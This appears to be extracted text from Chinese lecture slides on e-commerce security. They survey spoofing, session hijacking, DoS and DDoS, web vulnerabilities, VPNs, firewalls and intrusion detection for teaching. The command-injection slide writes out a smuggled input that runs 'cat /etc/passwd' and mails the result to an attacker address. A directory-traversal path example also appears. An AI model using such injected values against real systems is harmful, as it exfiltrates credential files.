术获取用户身份和鉴别细节。◼假冒一个不需要鉴别的主体是实施假冒攻击的另外一条有效途径。2023/9/7143第3章电子商务安全技术假冒——信任关系信任关系攻击者入侵入侵信任关系可以使得已经通过用户所在域主机鉴别的用户进行主机对主机的连接,而不需要再次鉴别,202
3/9/7144第3章电子商务安全技术欺骗◼欺骗是指一个攻击者在网络的另一端以不真实的身份与你交互。在假冒方式中,攻击者扮演了一个合法的实体。◼伪装、会话劫持和中间人攻击都属于欺骗攻击。真正Web网站的域名:AbcBank.com相似Web网站的域名:Abc-Bank
.com受害者引诱2023/9/7145第3章电子商务安全技术会话劫持真正Web网站攻击者网站受害者浏览售货清单截取我要付款获取用户地址、信用卡认为用户没有购买会话劫持是一种结合了窃听及欺骗技术在内的攻击手段,它
是指截取并维持一个其他实体开始的会话。2023/9/7146第3章电子商务安全技术中间人攻击◼中间人攻击可以暗中改变会话双方的通信流,并且使得会话双方毫无察觉。◼在会话劫持中,要求在两个实体之间进行的会话有第三方介入,会话劫持发生在一个会话
建立之后,而中间人攻击通常在会话的开始就参与进来了。◼其实会话劫持和中间人攻击的区别仅仅是一种语义上的区别,在实际上没有多大意义。2023/9/7147第3章电子商务安全技术中间人攻击——网页欺骗例子1请求篡改过的URL3初始页面内容5伪装后的页面内容4更改页面内容受害主机浏览器Web服务器202
3/9/7148第3章电子商务安全技术软件漏洞◼当前一些常见的网络软件和网络服务存在着安全漏洞,其中有一种软件漏洞是由于协议本身的缺陷造成的。◼例如TCP序列号的预测问题:a)当客户希望发起一个连接时,他首先发送一个它自己生成的序列号;b)服务器将用该序号和自己生成
的序列号响应客户;c)客户再利用服务器的响应序列号进行第二次响应。如果攻击者能够按照一定规则预测出客户的下一个序列号,则他就可以在会话过程中假冒该客户。2023/9/7149第3章电子商务安全技术拒绝服务◼当一个授权实体不能获得
对网络资源的访问或者当服务器长时间内不能正常地提供服务时,就发生了拒绝服务。◼拒绝服务的原因:◼网络部件的物理损坏◼网络协议本身缺陷◼洪水攻击:攻击者通过向目标主机发送大量的数据以消耗网络带宽或系统资源,从而使得目标主机超过负荷而无法提供正常的网络服务。2023/9/71
50第3章电子商务安全技术Smurf攻击者假冒受害者以广播模式发送ping包所有主机都对受害者进行响应受害者接收到整个网络的响应2023/9/7151第3章电子商务安全技术分布式拒绝服务攻击(DDoS)1攻击者在傀儡机上安装后门程序或植入特洛伊木马
3傀儡机同时攻击目标主机2傀儡机接收到攻击信号2023/9/7152第3章电子商务安全技术破坏消息的机密性和完整性◼消息机密性面临的威胁:通过窃听或假冒等手段截取在网络上传输的信息,然后通过对这些信息的分析来推断出数据特征。◼消息的完整性面临的威胁:◼攻击者可能会通过以下方式来篡
改消息:修改消息内容、替换一条消息、重放一条旧消息、改变消息来源或目标、删除消息等。2023/9/7153第3章电子商务安全技术cookie◼Cookie是一些数据文件,可以保存浏览器允许的与客户相关的信息,可用于:◼记录用户访问轨迹、机器名称、日期等。◼
在某些应用环境中,cookie还可以被看作是用户的代表。◼为服务器提供用户访问某个Web应用的上下文。◼Cookie占用你的磁盘空间,保存着与你有关但你不能看到等信息,并能传递给服务器而你不知道。◼Cookie存在着安全隐患。2023/9/7154第3章电子商务安全技术网站漏洞的威胁◼目录遍历◼
应用代码错误:◼交易状态的上下文问题◼植入外部命令◼利用SSI是调用外部命令的另外一种有效途径。◼跨网站脚本执行漏洞◼恶意移动代码2023/9/7155第3章电子商务安全技术目录遍历◼避免攻击者通过目录遍历从用户的当前工作区域进入到系统区域。myfiletmpusrsyssysf
ile../....当前工作区域◼利用目录遍历访问../../sys/sysfile2023/9/7156第3章电子商务安全技术应用代码错误:交易状态的上下文1浏览可以通过Cookie和改写URL保存和跟踪一个还未完成事务的当前状态。2023/9/7157第3章电子商务安全技术
应用代码错误:植入外部命令◼植入外部命令也是由于“不完全输入验证”程序漏洞造成的。◼开发者在程序开发过程中考虑到安全问题。假如一个脚本包含了下面的语句:system(“mail$input”)1)用户输入的参数值为user@some.org2)用户输入为:user@some.or
g;cat/etc/passwd|mailattacker@some.org2023/9/7158第3章电子商务安全技术应用代码错误:SSI◼服务器端嵌入(ServerSideInclude,SSI)是一种基于服务器的网页制作技术,它实质上就是指示服务器在当前文档中嵌入指
定文件的指令。◼服务器端嵌入指令将由服务器解释执行,并且服务器将指令的输出作为HTML文件的一部分。◼SSI代码在客户端是不可见的,客户端只能看到它执行的效果。比如exec指令类似于上文例子中的system功
能。2023/9/7159第3章电子商务安全技术应用代码错误:跨网站脚本执行漏洞1提交给包含了HTML代码的参数:如留言html文件3写入2浏览恶意脚本可以插入到html文件攻击者受害者2023/9/7160第3章电子商务安全技术恶意移
动代码◼移动代码通常是指动态可下载的可执行内容,其中可执行内容实际上是任何可以执行的数据,移动代码的例子包括ActiveX控件和JavaScript。◼攻击者也可以利用这种技术使得目标主机感染病毒。◼防止
恶意移动代码攻击的方法:◼代码签名:验证的仅仅只是源代码,但无法验证这些代码本身的正确性或安全性。◼代码在运行时必须要受到限制和监控。2023/9/7161第3章电子商务安全技术安全执行applet的必要条件◼系
统必须控制applet对重要资源的访问,如文件系统、处理器等。◼编程语言可以通过阻止缓冲区溢出保护内存。◼系统可以通过清除内存数据来阻止对象的重用;并可以回收不再使用的变量所占用的内存。◼系统应该控制applet之间的通信,以及控制applet通过系统调
用影响Java系统外的环境。2023/9/7162第3章电子商务安全技术3.4.2虚拟专用网络◼虚拟专用网络(VPN)是指在公共网络中建立一个专用网络,数据通过建立的虚拟安全通道在公共网络中传播。◼它具有的特点:◼虚拟的网络◼具备
了公共网和专用网的特点:不安全的公共数据网络上向用户提供安全的专用网络。◼一种廉价而又安全可靠的通信方法:帮组企业与远程用户、分支机构或商业伙伴建立安全的连接2023/9/7163第3章电子商务安全技术隧道技术数据包数据包数据报头封装目的地数据包数据包数据报头解封目的地隧道我们将
重新封装的数据包在公共网络上传递时所经过的逻辑路径称为隧道。2023/9/7164第3章电子商务安全技术网络隧道协议◼第二层的隧道协议,工作于数据链路层,如点到点隧道协议(PPTP)、第2层转发协议(L2F)、第2层隧道协议(L2TP)。L2TP利用了两类消息:◼控制消息:
可用于隧道的建立、维护和清除;◼数据消息:可用于封装PPP帧以便它能在隧道中进行传输。◼第三层隧道协议,工作于网络层,如IPSec定义了一种标准方法来处理加密的数据。◼介于第二层和第三层之间的隧道协议。如MPLS隧道协议2023/9/7165第3章电子商务安全技术加密技术◼加密技术可以在协议栈的任
意层进行:◼在链路层进行可以保护两台主机之间传输的消息,但目前还没有统一的加密标准。◼在网络层进行可以使得两个进程之间传输的消息以加密的数据形式通过整个网络。而在网络层中的加密标准是IPSec。◼某些VPN设备采用了L2TP和IPSec相结合的技术,即它们采用L2TP作
为隧道协议,而采用IPSec协议来保护数据。2023/9/7166第3章电子商务安全技术隧道的建立◼隧道的建立有两种方式:◼客户发起方式(Client-Initiated):隧道一般是由用户或客户端计算机主动请求创建
的。◼客户透明方式(Client-Transparent):隧道不是由用户发起的而是由支持VPN的设备请求创建的。隧道一旦建立,数据就可以通过隧道发送。2023/9/7167第3章电子商务安全技术VPN工作原理VPN服务器VPN服务器数据包数据包隧道封装后数
据包2023/9/7168第3章电子商务安全技术VPN应用领域◼远程访问虚拟网(AccessVPN):远程用户可以通过公网远程拨号等方式与企业内部网络的VPN设备建立起隧道,实现访问连接。◼企业内部虚拟网(IntranetVPN)。一个组织机构的
总部与其跨地域的分支机构可以采用VPN技术构建组织内部的虚拟专用网。◼企业扩展虚拟网(ExtranetVPN)。具有共同利益的组织或合作伙伴可以通过VPN技术构建虚拟专用网,从而实现内联网的网络资源和外部特定网络资源的相互
共享。2023/9/7169第3章电子商务安全技术3.4.3防火墙◼防火墙是一种用来保护本地系统或网络的设备,以防止网络攻击破坏系统或网络。◼通常位于被保护的网络和外部网络的边界。◼根据防火墙所采用的技术,防火墙可以分为:◼包过滤型防火墙◼应用代理型防火墙2023/9/7170第3章电子商务安全
技术包过滤型防火墙数据包过滤技术就是根据每个数据包头内的标志来确定是否允许该数据包通过防火墙,其中过滤的依据是系统内设置的过滤规则。远程网络1(拒绝访问)远程网络2(接收访问)包过滤型防火墙HTTPTelnet2023/9/7171第3章电子商务安全技术包过滤防火墙
特点◼一种最为简单的防火墙,网络性能和透明性好。◼需要管理人员设置相当详细的过滤规则。随着过滤规则数目的增大,不仅增加了出错的概率,而且系统的性能也会受到极大影响。◼包过滤防火墙不能根据数据包的数据部分进行过滤处理,无法识别基于应用层的恶意侵入。◼每次只对单个包
进行检查,数据包之间缺乏上下文关联信息,无法检查到分布在多个数据包中的攻击信号。2023/9/7172第3章电子商务安全技术状态检测防火墙◼状态检测(StatefulInspection)防火墙引入了动态状态表:a)能够从接收到的数据包中提取状态信息,并将这些信息保存在一个动
态状态表中,利用该状态表可以验证后续的数据包;b)访火墙将依据当前数据包的状态、状态表以及过滤规则判断是否允许该数据包通过防火墙。◼通过跟踪输入流的包序列和数据包所处的状态来增强防火墙的控制能力。2023/9/7
173第3章电子商务安全技术应用代理型防火墙◼应用代理位于外部网络和内部网络之间,为应用软件解释协议流,并且根据协议内部可见部分控制它们通过防火墙的行为。请求server内部网络Internet客户防火墙请求转发2023/9/7174第3章电子商务安全技术代理类型防火墙特点◼
代理类型防火墙工作于应用层,主要用于防范应用层攻击。◼除了依据数据包头的数据,还可以依据数据包内的数据部分对数据包进行过滤。◼但它实现起来比较复杂。它要求代理软件的设计者能够理解每个应用协议以及它们的缺陷。◼处理速度较慢的。由于应用代理需要在应
用层过滤每一个数据包,它的处理延迟会很大。2023/9/7175第3章电子商务安全技术防火墙的限制◼防火墙只能保护内部网免受外部攻击者的攻击,而不能保证计算机的所有安全问题。◼它不能阻止不经过防火墙的攻击。◼防火墙对允许进
入内部网的内容只能进行很少的控制。◼防火墙也很难阻止来自网络内部的攻击。2023/9/7176第3章电子商务安全技术3.4.4入侵检测系统◼防火墙能够阻止一些已知的入侵事件发生,它只是一种被动性防御性工具。◼外部攻击者也可能会利用防火墙的漏洞,绕过防火墙而入侵系统。◼入侵检测系统(Intr
usionDetectionSystem,IDS)可以弥补防火墙的不足,是一种主动保护网络免受攻击的网络安全系统:◼实时监视、分析用户及系统的活动,并识别出由内部人员或外部攻击者进行的不正常活动,并对此作出相应的反应。2
023/9/7177第3章电子商务安全技术IDS相关规范◼分布的IDS协同工作才能发现某些复杂的入侵活动。◼美国国防高级研究计划署(DARPA)提出了通用入侵检测框架(CIDF)。◼互联网工程任务组(IETF)的入侵检测工作组(IDWG)制定了一系列的标准草案
。IDWG主要负责制订入侵检测、响应系统以及管理系统之间共享信息的数据格式和交换规程。◼其中一个IDWG草案建议IDS可以由传感器(sensor)、分析器、管理器组成。2023/9/7178第3章电子商务安全技术入
侵检测系统组件事件传感器数据源分析器管理器管理员操作员行为告警通知安全策略响应传感器将检测到的事件转发给分析器,分析器将采用入侵检测方法分析这些事件以识别出安全管理员应关注的事件。如果检测到异常情况,分析器将向管理器发出告警消息。2023/9/717
9第3章电子商务安全技术入侵检测系统的分类◼根据入侵检测系统的输入数据来源,入侵检测系统可以分为:◼基于主机的入侵检测系统:主要用于保护单个主机,它根据主机系统提供的系统日志和审计记录识别针对该主机的恶意或可疑事件。◼基于网络的入侵检测系
统:它使用原始网络数据包作为分析的数据源,并通过对这些数据的分析识别出各种入侵事件。该类系统通常包含多个传感器,这些传感器需要和IDS分析器协同工作以完成安全分析和检测。2023/9/7180第3章电子商务安全技术
入侵检测的检测方法◼基于误用入侵检测方法:它需要预先定义入侵模式,然后IDS将这些入侵模式和IDS所收集的信息进行匹配,以识别出用户或系统活动中存在的已知攻击模式。◼基于异常的检测方法:异常入侵检测系统需要为主体建立正常行为模式
的特征轮廓,然后将当前主体行为与该主体的正常特征轮廓进行比较,以检测出偏离情况。它寻找的是异常活动,而不是寻求匹配。2023/9/7181第3章电子商务安全技术入侵检测方法的差别◼基于误用入侵检测方法只能检查
已知入侵模式,无法检测出新的入侵模式。它的的关键问题就是如何设计入侵模式,使它既能够表达入侵现象又不会将正常的活动包含进来。◼异常入侵检测不受已知入侵模式的限制,能够检测出新的入侵行为以及未知、潜在的系统缺陷。2023/9/7182第3章电子商务安全技术3.5实例分析◼电子商务系统的基础
设施主要包括:网络架构、基本网络服务和Web服务和文件服务等。◼一种更安全的网络架构设计方法是使用合理的网络分段:◼有效地控制各个网络段之间的通信流量。◼为端口监视和筛选以及其他网络管理任务提供相当大的灵活性。◼允许管理员根据用户安全
要求配置各个网段。◼减少威胁的数量,限制由于单个弱点而导致的损失。2023/9/7183第3章电子商务安全技术网络结构模型Internet不受控区域InternetDMZ受控区域限制区域管理系统安全区域代理服务器Web服
务器2023/9/7184第3章电子商务安全技术BtoB安全解决方案DNS对内WWW服务器Internet数据库服务器代理服务器外部服务器内部网络防火墙对外WWW服务器非军事区管理工作站2023/9/7185第3章电子商务安
全技术网络攻击的全面防范◼虚拟私有网络、防火墙和入侵检测系统能够阻止部分网络攻击。◼开发阶段就开始仔细考虑安全因素,这样才能有效地减少程序漏洞。◼减少程序漏洞的首要原则就是服务器永远不要相信用户输入的任何数据。◼最小
特权原则也是简单而又有效的安全策略。系统管理员只应该赋予服务器上的程序所需的最低权限。2023/9/7186第3章电子商务安全技术习题1.防火墙能否阻止攻击者利用跨站脚本执行漏洞而实施的攻击?为什么?2.某个企业分别在
上海和北京有两个办事处,并希望通过VPN连接这两个办事处的局域网,请问如何解决这个问题呢?3.一些人可以将恶意移动代码放置到网站上,等待用户的下载。请问有什么方法可以减少这种危险呢?2023/9/7187第3章电子商务安全技术